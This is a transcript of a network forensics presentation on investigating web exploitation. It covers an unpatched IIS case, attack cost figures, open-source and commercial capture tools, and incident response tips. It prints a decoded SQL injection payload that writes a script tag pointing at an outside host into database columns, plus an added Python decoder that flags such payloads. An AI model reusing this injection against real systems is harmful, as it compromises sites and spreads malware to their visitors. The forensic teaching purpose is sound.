Forensic Investigations of Web Exploitations

Presentation transcript:

Forensic Investigations of Web Exploitations Ondrej Krehel, CISSP, CEH, Lifars LLC

What do I do - Digital Firefighters
New cyber jobs

Case from cyber field
Scenario:
Web server in the DMZ zone
Inbound is filtered, however outbound is not
Server is running an un-patched version of IIS
Incident occurred ?!? - need to confirm it and, if yes, incident response and investigation
Recorded traffic file is available in pcap format, however we don't have any logs, neither from the firewall nor from the web server
We want to know what happened and whether we can find traces of commands as well as malware
Wireshark analysis will be presented

Incident by Breach – All time (DatalossDB.org)

Web attacks

Cost
The first published study: 2011 Second Annual Cost of Cyber Crime Study by the Ponemon Institute
An average web-based attack costs $143,209; malicious code, $124,083; and malicious insiders, $100,300
Web-borne attacks, malicious code and insiders are the most costly, making up more than 90% of all cybercrime costs per organization per year

HTTP GET – RFC 2616
GET /home/site_content_3.asp?s=290';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x…

HTTP GET Decoded
CAST obfuscated data, after decoding:
declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';' from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m);
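The decoding step shown on the two slides above (URL-decode the request, pull the hex out of CAST(0x… AS NVARCHAR(n)), decode it as UTF-16LE) can be scripted over request lines exported from the pcap. The following is an added example, not code from the presentation; the sample request is constructed here (its hex is generated in the block and the script domain is a placeholder), and the indicator list is an assumption for review, not a complete signature.

```python
"""Decode CAST(0x...) hex-obfuscated SQL injection payloads from HTTP request lines."""
import re
from urllib.parse import unquote

# Matches the CAST(0x<hex> AS [N]VARCHAR(n)) construct that hides the real statement.
CAST_HEX_RE = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)\s*\(\s*\d+\s*\)\s*\)", re.IGNORECASE
)
# Tokens worth flagging in a decoded statement (assumed review list, not exhaustive).
SUSPICIOUS_TOKENS = ("sysobjects", "syscolumns", "exec(", "<script", "xp_cmdshell")


def decode_cast_payloads(request_line: str) -> list:
    """Return every decoded CAST payload found in one raw HTTP request line."""
    decoded = []
    text = unquote(request_line)  # undo %20 etc.; the CAST construct is URL-encoded
    for hexdata, sqltype in CAST_HEX_RE.findall(text):
        raw = bytes.fromhex(hexdata[: len(hexdata) & ~1])  # drop a dangling nibble
        # NVARCHAR is UTF-16LE on SQL Server; VARCHAR is a single-byte code page
        if sqltype.upper() == "NVARCHAR":
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def suspicious_tokens(sql: str) -> list:
    """Return the review tokens present in a decoded statement."""
    low = sql.lower()
    return [t for t in SUSPICIOUS_TOKENS if t in low]


# Constructed sample: a stand-in for the statement on the slides with a placeholder
# domain; the hex is generated here, not copied from any capture.
SAMPLE_SQL = ("declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+"
              "']=rtrim(convert(varchar,'+b.name+'))+''<script src=\"http://malicious.example/0.js\">"
              "</script>'';' from dbo.sysobjects a,dbo.syscolumns b where a.id=b.id and a.xtype='U';"
              "exec(@m);")
SAMPLE_REQUEST = ("GET /home/site_content_3.asp?s=290';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
                  + SAMPLE_SQL.encode("utf-16-le").hex().upper()
                  + "%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1")

if __name__ == "__main__":
    for stmt in decode_cast_payloads(SAMPLE_REQUEST):
        print("decoded:", stmt)
        print("flags:", suspicious_tokens(stmt))
```

Request lines can be exported from the capture with Wireshark (Follow TCP Stream or Export Objects) and fed to decode_cast_payloads one per line.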

BeEF exploitation of the victim

Open Source
Review ( http://www.net.ohio-state.edu/software/ )
Tcpdump ( http://www.tcpdump.org/ )
Ethereal ( http://www.ethereal.com/ )
Tcpextract ( http://tcpxtract.sourceforge.net/ )
Vomit ( http://vomit.xtdnet.nl/ )
Voipong ( http://www.enderunix.org/voipong/ )
Chaosreader ( http://chaosreader.sourceforge.net/ )
NetworkMiner ( http://networkminer.sourceforge.net/ )
UCSniff ( http://ucsniff.sourceforge.net/ )
Xplico ( http://www.xplico.org/ )

Open Source
Tcpick ( http://tcpick.sourceforge.net/ )
Tcptrace ( http://www.tcptrace.org/ )
Tcpflow ( http://www.circlemud.org/~jelson/software/ )
Tcpreplay ( http://tcpreplay.sourceforge.net/ )
Ssldump ( http://freshmeat.net/projects/ssldump/ )
AIM Sniff ( http://sourceforge.net/projects/aimsniff )
Ettercap ( http://ettercap.sourceforge.net/ )
Wireshark ( http://www.wireshark.org/ )
TCPDstat ( https://github.com/netik/tcpdstat )
Kismet ( http://www.kismetwireless.net/ )

Open Source
DataEcho ( http://sourceforge.net/projects/data-echo/ )
EtherPeg ( http://www.etherpeg.org/ )
Driftnet ( http://freshmeat.net/projects/driftnet/ )
Good article on how to do it in open source: http://www.forensicfocus.com/open-source-network-forensics-appliance-howto

How to Record
SPAN port (Switched Port Analyzer) or mirror port
Can be part of a SPAN local or remote VLAN
Physical tap - TX and RX packets
Don't use external DNS resolution
Secure Access: use ssh and ssl, segment the network

Network Forensics
Commercial Network Forensic Tools: Netwitness Investigator, Niksun NetVCR, WildPackets OmniPeek, Access Data SilentRunner, Guidance Software Encase Enterprise
Own build - open-source tools, custom signatures: Review, Tcpdump, Ethereal, Tcpextract, Vomit, Voipong, Chaosreader, Tcpick, Tcptrace, Tcpflow, Tcpreplay, Ssldump, AIM Sniff, Ettercap, Xplico, UCSniff, NetworkMiner
Often integrated in IDS, IPS, HoneyPots: Snort, Kfsensor, Honeyd, Specter
Losses documentation – NIC, kernel, switch
Examiner action logging

Protocol IPv4

OSI Model

Xplico

Xplico

Chaosreader

Chaosreader

Tips for Businesses
Incident Response Plan
Establish relationships with vendors before an incident
Consider subscribing to a Cyber Response or Data Breach program
Review current layers of protection, and network topology
Incident Response Plan
Can you recognize the incident?
Is evidence properly preserved?
Are formalized Incident Response policies in place and tested on an annual basis?
Is internal staff properly trained?

Contacts Ondrej Krehel, CISSP, CEH, Information Security Officer Lifars, LLC Email: krehel@lifars.com

Abbreviations
C & C – Command and Control Channels
VOIP – Voice over Internet Protocol
SQL – Structured Query Language
MFT – Master File Table
DNS – Domain Name System
P2P – Peer-to-peer networks
UPX – Ultimate Packer for eXecutables
CAST – Encoding and SQL function
MRU – Most Recently Used section in Windows registry
IDS/IPS – Intrusion Detection/Prevention Systems
LKM – Loadable Kernel Module
IM – Instant Messaging
TCP/UDP – Common transfer protocols

Abbreviations Hexadecimal Encoding